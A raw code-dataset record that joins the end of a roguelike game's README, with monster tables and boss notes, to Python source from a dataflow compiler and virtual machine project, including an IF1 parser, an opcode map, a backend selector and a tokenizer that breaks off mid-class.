class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">prince</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain level 2</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">moon walker</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">serpent</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td 
class=\"org-left\">'gekido', 'zenjiai'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl10 fighter</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl7 thief</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 ninja</td>\n<td class=\"org-left\">monk</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">desert golem</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">petit demon</td>\n<td class=\"org-left\">demon</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kerberos</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgb8d9202\"></a>\n\n## Deep floors\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-left\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">stone giant</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">darkbull</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 bishop</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 fighter</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl10 mage</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td 
class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">pirate</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">master ninja</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">shy ghost</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">moon phantom</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">demon cat</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fi,co,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">golem</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">High e.p. weak to 'senmetsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">flame dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ascetic priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'shisubeshi'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mad wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'chissoku'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">master</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">musashi</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Attack only, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">vampire</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 2</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">earth demon</td>\n<td class=\"org-left\">demon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">'zettaireido', regist death 66%</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotten giant</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spells</td>\n<td class=\"org-left\">breath, weak on 'senmetsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotten dragon</td>\n<td 
class=\"org-left\">dragon</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'zettaireido', breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dark baron</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hattori</td>\n<td class=\"org-left\">conhead</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Attack only, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">joker</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">breath, critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">arch wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">'chissoku', 'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">magatsukami</td>\n<td class=\"org-left\">unseen being</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 3, 'kakubaku', etc.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dracula</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">sen,death</td>\n<td class=\"org-left\">Drain lvl 4, 'chissoku'</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orge29b2ef\"></a>\n\n## Boss and special monsters\n\n\n<a id=\"org7b8b294\"></a>\n\n### gate keeper\n\nHuge scorpion originated in an SNES game, Tenchi-sozo.\nIt was a boss monster on floor 1 but hasn't been implemented. Rather weak on deepest floors.\n\n\n<a id=\"org93ed8e5\"></a>\n\n### d????? ???, t?? ????, a????\n\nBoss monsters. You'll need special keys to break into the boss rooms. Special keys should be placed somewhere on the same floor. Look for `,` floor tile.\n\n\n<a id=\"orgf5f2654\"></a>\n\n### d????? ????\n\nThe last boss. He is with mighty earth demons, which makes the last battle most difficult to win. Hint: Use certain spells. Though extremely risky, you would have no other choice.\n\n\n<a id=\"org52768ce\"></a>\n\n### S???????, N??????\n\nAncient gods from the past. You are doomed to be destroyed. Run away immediately if you see them.\n\n\n<a id=\"org861f339\"></a>\n\n# Contact\n\nKyosuke Achiwa - @kyos\\_achwan - achiwa912+gmail.com (please replace `+` with `@`)\n\nProject Link: <https://github.com/achiwa912/daemonlord>\n\n\n<a id=\"org99eca6e\"></a>\n\n# Acknowledgements\n\nThank you very much for these great Wizardry and Rogue sites.\n\n- [得物屋24時間 BOLTAC'S TRADING POST](http://www.pekori.jp/~emonoya/) Various monster, spell, item data\n- [Wizardry(NES) 解析](https://taotao54321.github.io/appsouko/work/Game/Wiz1_NES/) Internal algorityms of NES Wizardry\n- [ず's WiLiKi Wizardry1/Apple/解析メモ](https://wiliki.zukeran.org/index.cgi?Wizardry1%2FApple%2F%B2%F2%C0%CF%A5%E1%A5%E2) Internal algorithms of Apple II Wizardry\n- [We Love WIZARDRY for WonderSwan](http://multix.jp/wizardry/) Monster, spell, item data table\n- [Yet Another Roguelike Tutorial - Written in Python 3 and TCOD](http://rogueliketutorials.com/tutorials/tcod/v2/) Auto-generate maps\n\n" } ]
2
mathsaey/Dataflow-Software-Stack
https://github.com/mathsaey/Dataflow-Software-Stack
b6cd4ffc26d3d46aec514484779e1d3cd35ecdf4
93bf5c9f166f326947a9b725518190bf530a80bc
dc0dfcdbccb7fcdca463804ea03b106b558aed57
refs/heads/master
2016-09-06T08:31:56.790178
2014-09-30T18:26:21
2014-09-30T18:26:21
12,961,445
0
2
null
null
null
null
null
[ { "alpha_fraction": 0.695207953453064, "alphanum_fraction": 0.7003162503242493, "avg_line_length": 24.073171615600586, "blob_id": "1793777b261a1ab919b2a72e1125eb7fba8f9d20", "content_id": "7b351aaafa87ca26c83acd73818b03e3c4b60e6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DISc/frontEnd/IF1/graph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graph.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.graph\n# \\brief Node parser\n# \n# This module allows us to parse all of the \n# graph elements (compound nodes, nodes and subgraphs)\n##\n\nimport environment\nimport operations\nimport compound\nimport type\n\nimport IGR\n\n# --------- #\n# Constants #\n# --------- #\n\n# N <label> <operation code>\n_n_label_idx \t= 1\n_n_code_idx \t= 2\n\n# G <type_reference> <name>\n# X <type_reference> <name>\n# I <type_reference> <name>\n_g_type_idx\t\t= 1\n_g_name_idx\t\t= 2\n\n# { Compound <label> <operation code>\n_cs_label_idx\t= 2\n_cs_code_idx \t= 3\n\n# } <label> <operation code> <association list length> <association list>\n_ce_label_idx\t= 1\n_ce_code_idx \t= 2\n_ce_len_idx\t\t= 3\n_ce_lis_idx\t\t= 4\n\n# ------------ #\n# Graph Parser #\n# ------------ #\n\n## Parse a standard subgraph.\ndef parseSubGraph(arr, ctr):\n\tname = arr[_g_name_idx][1:-1]\n\ttypeIdx = int(arr[_g_type_idx])\n\tsig = type.getType(typeIdx)\n\tinputs = len(sig.args.list)\n\toutputs = len(sig.res.list)\n\n\tgraph = IGR.createSubGraph(name, inputs, outputs)\n\n\tenvironment.popScope()\n\tenvironment.scope(graph)\n\n## Parse a subgraph of a compound node.\ndef parseCompoundSubGraph(arr, ctr):\n\tgraph = IGR.createCompoundSubGraph()\n\n\tenvironment.popScope()\n\tenvironment.addSubGraph(graph)\n\tenvironment.scope(graph)\n\n## \n# Determine which kind of \n# subgraph we are dealing with.\n##\ndef parseGraph(arr, ctr):\n\tif environment.isCompound():\n\t\tparseCompoundSubGraph(arr, ctr)\n\telse: \n\t\tparseSubGraph(arr, ctr)\n\n# ----------- #\n# Node Parser #\n# ----------- #\n\ndef parseNode(arr, ctr): \n\tlabel = int(arr[_n_label_idx])\n\topCode = int(arr[_n_code_idx])\n\tnode = None\n\n\toperation = operations.get(opCode)\n\tnode = IGR.createOperationNode(environment.getSubGraph(), 
operation)\n\n\tenvironment.addNode(label, node)\n\n# --------------- #\n# Compound Parser #\n# --------------- #\n\n##\n# Parse the start of a compound node.\n#\n# We do this by creating a compound scope to \n# store the subgraphs. We also tell the environment\n# that we entered a compound node.\n#\n# Finally, we add a dummy node that will be popped\n# by the first subgraph we meet.\n##\ndef parseCompoundStart(arr, ctr):\n\tenvironment.scopeCompound()\n\tenvironment.enterComp()\n\tenvironment.scope(None)\n\ndef parseCompoundEnd(arr, ctr):\n\t# Enter the compound scope\n\tenvironment.popScope()\n\t\n\t# get and order the subgraphs of the compound node.\n\tlength = int(arr[_ce_len_idx])\n\tendIdx = _ce_lis_idx + length\n\tassocLst = arr[_ce_lis_idx:endIdx]\n\tsubGraphs = environment.getSubGraphs()\n\tresGraphs = []\n\n\tfor idx in assocLst:\n\t\tgraph = subGraphs[int(idx)]\n\t\tgraph.name = str(idx)\n\t\tresGraphs += [graph]\n\n\t# Restore the environment\n\tenvironment.exitComp()\n\tenvironment.popScope()\n\n\t# Create the compound node\n\tcompType = arr[_ce_code_idx]\n\tcompType = compound.getCompound(compType, ctr)\n\tnode = IGR.createCompoundNode(\n\t\tcompType, \n\t\tenvironment.getSubGraph(), \n\t\tresGraphs)\n\n\t# Add the node to the environment.\n\tlabel = int(arr[_ce_label_idx])\n\tenvironment.addNode(label, node)" }, { "alpha_fraction": 0.55105060338974, "alphanum_fraction": 0.6348031759262085, "avg_line_length": 22.46527862548828, "blob_id": "3b761c0d17187f45c647bc03467d59adcae17606", "content_id": "dffe1b2ad2d1bad42ce98d6e3146af9685ca85a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3379, "license_type": "no_license", "max_line_length": 87, "num_lines": 144, "path": "/DISc/frontEnd/IF1/operations.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.operations\n# \\brief IF1 operations\n#\n# This module defines names for the various IF1\n# node types.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ---------------- #\n# Function Mapping #\n# ---------------- #\n\noperations = {\n\t100 : 'arrAddBck',\n\t101 : 'arrAddFrnt',\n#\t102 : 'AAdjust', # Unknown operation\n\t103 : 'ABuild',\n\t104 : 'arrCat',\n\t105 : 'arrGet',\n\t106 : 'AFill',\n\t107 : 'AGather',\n\t108 : 'arrIsEmpty',\n\t109 : 'arrBound',\n\t110 : 'ALimL',\n#\t111 : 'ARemH',\n#\t112 : 'ARemL',\n\t113 : 'arrRepl',\n\t114 : 'AScatter',\n\t115 : 'ASetL',\n\t116 : 'arrLen',\n\t117 : 'abs',\n#\t118 : 'BindArguments',\n\t119 : 'bool',\n\t120 : 'Call',\n\t121 : 'string',\n\t122 : 'div',\n\t123 : 'float',\n\t124 : 'equals',\n\t125 : 'Exp',\n#\t126 : 'FirstValue',\n#\t127 : 'FinalValue',\n\t128 : 'floor',\n\t129 : 'int',\n#\t130 : 'IsError',\n\t131 : 'less',\n\t132 : 'lessEq',\n\t133 : 'max',\n\t134 : 'min',\n\t135 : 'sub',\n\t136 : 'mod',\n\t137 : 'neg',\n\t138 : 'noOp',\n\t139 : 'not',\n\t140 : 'notEq',\n\t141 : 'add',\n\t142 : 'range',\n#\t143 : 'RBuild',\n#\t144 : 'RElements',\n#\t145 : 'RReplace',\n#\t146 : 'RedLeft',\n#\t147 : 'RedRight',\n#\t148 : 'RedTree',\n#\t149 : 'Reduce',\n#\t150 : 'RestValues',\n\t151 : 'float',\n\t152 : 'mul',\n#\t153 : 'Trunc',\n#\t154 : 'PrefixSize',\n#\t155 : 'Error',\n#\t156 : 'ReplaceMulti',\n#\t157 : 'Convert',\n#\t158 : 'CallForeign',\n#\t159 : 'AElementN',\n#\t160 : 'AElementP',\n#\t161 : 'AElementM',\n#\t170 : 'AAddLAT',\n#\t171 : 'AAddHAT',\n#\t172 : 'ABufPartition',\n#\t173 : 'ABuildAT',\n#\t174 : 'ABufScatter',\n#\t175 : 'ACatenateAT',\n#\t176 : 'AElementAT',\n#\t177 : 'AExtractAT',\n#\t178 : 'AFillAT',\n#\t179 : 'AGatherAT',\n#\t180 : 'ARemHAT',\n#\t181 : 'ARemLAT',\n#\t182 : 'AReplaceAT',\n#\t183 : 'ArrayToBuf',\n#\t184 : 'ASetLAT',\n#\t185 : 'DefArrayBuf',\n#\t186 : 'DefRecordBuf',\n#\t187 : 'FinalValueAT',\n#\t188 : 'MemAlloc',\n#\t189 : 'BufElements',\n#\t190 : 'RBuildAT',\n#\t191 : 'RecordToBuf',\n#\t192 : 'RElementsAT',\n#\t193 : 'ReduceAT',\n#\t194 : 'ShiftBuffer',\n#\t195 : 'ScatterBufPartitions',\n#\t196 : 'RedLeftAT',\n#\t197 : 'RedRightAT',\n#\t198 : 'RedTreeAT'\n}\n\ndef get(label, ctr = \"?\"):\n\tkey = int(label)\n\ttry:\n\t\tfunc = operations[key]\n\texcept KeyError:\n\t\tlog.error(\"Line %s, Undefined function code encountered: %d, using NoOp\", ctr, label)\n\t\treturn 'noOp'\n\telse: \n\t\treturn func\n" }, { "alpha_fraction": 0.7193605899810791, "alphanum_fraction": 0.7225577235221863, "avg_line_length": 25.30841064453125, "blob_id": "8e1376ed9533d302b68b51f5f3ef4d395be53b3b", "content_id": "a7a5a42dc286c9d0319ab26e7d496e1e93245266", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 85, "num_lines": 107, "path": "/DISc/backEnd/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the 
Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd\n# \\brief DISc backend Selector\n# \n# This module serves as an interface to any backend that the user may choose.\n#\n# A backend only needs to define 2 elements.\n# * A function generate(), that takes no inputs and that \n#\treturns a string version of the output language.\n# * An *extension* attribute that contains the file extension of the output language.\n##\n\nimport importlib\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Store the current back end\nbackEnd = None\n\n## Path to the output file.\npath = None\n\n##\n# Select a backend to use.\n#\n# \\param name \n#\t\tA name that matches a package in the\n#\t\tbackend package.\n##\ndef set(name):\n\tglobal backEnd\n\ttry:\n\t\tbackEnd = importlib.import_module('.%s' % name, __name__)\n\texcept ImportError:\n\t\tlog.error(\"Backend '%s' not found.\", name)\n\n##\n# Set up the backend from the\n# command line arguments.\n#\n# \\param fileName\n#\t\tThe name of the input file, without\n#\t\tthe extension.\n# \\param backEndFlag\n#\t\tThe value passed to the backend flag.\n# \\param outputFlag\n#\t\tThe value passed to the output flag.\n##\ndef setUp(fileName, backEndFlag, outputFlag):\n\tglobal path\n\tset(backEndFlag)\n\n\tif backEnd:\n\t\tif outputFlag: path = outputFlag\n\t\telse: path = '%s.%s' % (fileName, backEnd.extension)\n\telse:\n\t\tlog.error(\"No backend specified...\")\n\n## \n# Ask the backend to\n# Generate the output language.\n##\ndef generate():\n\tif backEnd:\n\t\treturn backEnd.generate()\n\telse:\n\t\tlog.error(\"No backend specified...\")\n\n##\n# Write the generated output\n# to a file.\n##\ndef toFile():\n\tif backEnd:\n\t\tresult = generate()\n\t\tfile = open(path, 'w')\n\t\tfile.write(result)\n\t\tfile.close()\n\telse:\n\t\tlog.error(\"No backend specified...\")\n" }, { "alpha_fraction": 0.6828581690788269, "alphanum_fraction": 0.6857947111129761, "avg_line_length": 24.704402923583984, "blob_id": "7b2e5675460e088ea015e6e9ca223bade77be3a9", "content_id": "38408f46b620b6eb4cefb56aacb03cc11f5bdd6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8173, "license_type": "no_license", "max_line_length": 79, "num_lines": 318, "path": "/DVM/core/tokenizer.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# tokenizer.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without 
restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.tokenizer\n# \\brief DVM token creator\n#\n# This module defines the more practical part of\n# the instruction execution. It is responsible for generating\n# new tokens for instructions. It's also responsible for managing\n# the contexts and destinations of these tokens when the semantics of\n# the instruction call for it.\n##\n\nfrom token import Tag, StopTag, Token\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Token creator.\n#\n# The token creator is responsible for\n# wrapping results of instructions in tokens.\n##\nclass Tokenizer(object):\n\tdef __init__(self, core):\n\t\tsuper(Tokenizer, self).__init__()\n\t\tself.core = core\n\n\t\tself.switcher = Switcher(self)\n\t\tself.contexts = ContextManager(self)\n\n\t\tself.contextMap = {}\n\t\tself.restoreMap = {}\n\n\t##\n\t# Add a token to the runtime.\n\t# Use this instead of directly using the core, so that\n\t# we have a central point for redirecting the token\n\t# to a different core.\n\t##\n\tdef add(self, token, core = None):\n\t\tself.core.add(token, core)\n\n\t## Create a simple token, with a known destination.\n\tdef simple(self, datum, toInst, toPort, context, core = None):\n\t\ttag = Tag(toInst, toPort, context)\n\t\ttok = Token(datum, tag)\n\n\t\tif core == None:\n \t\t\tself.add(tok)\n \t\telse:\n \t\t\tself.add(tok, core)\n\n\t##\n\t# Create a stop token.\n\t#\n\t# \\param tok\n\t#\t\tThe token to convert to\n\t#\t\ta stop token.\n\t##\n\tdef stopToken(self, tok):\n\t\ttok.tag = StopTag()\n\t\tself.add(tok)\n\n##\n# Context Manager\n#\n# The Context manager is responsible for changing\n# and restoring the context of tokens.\n##\nclass 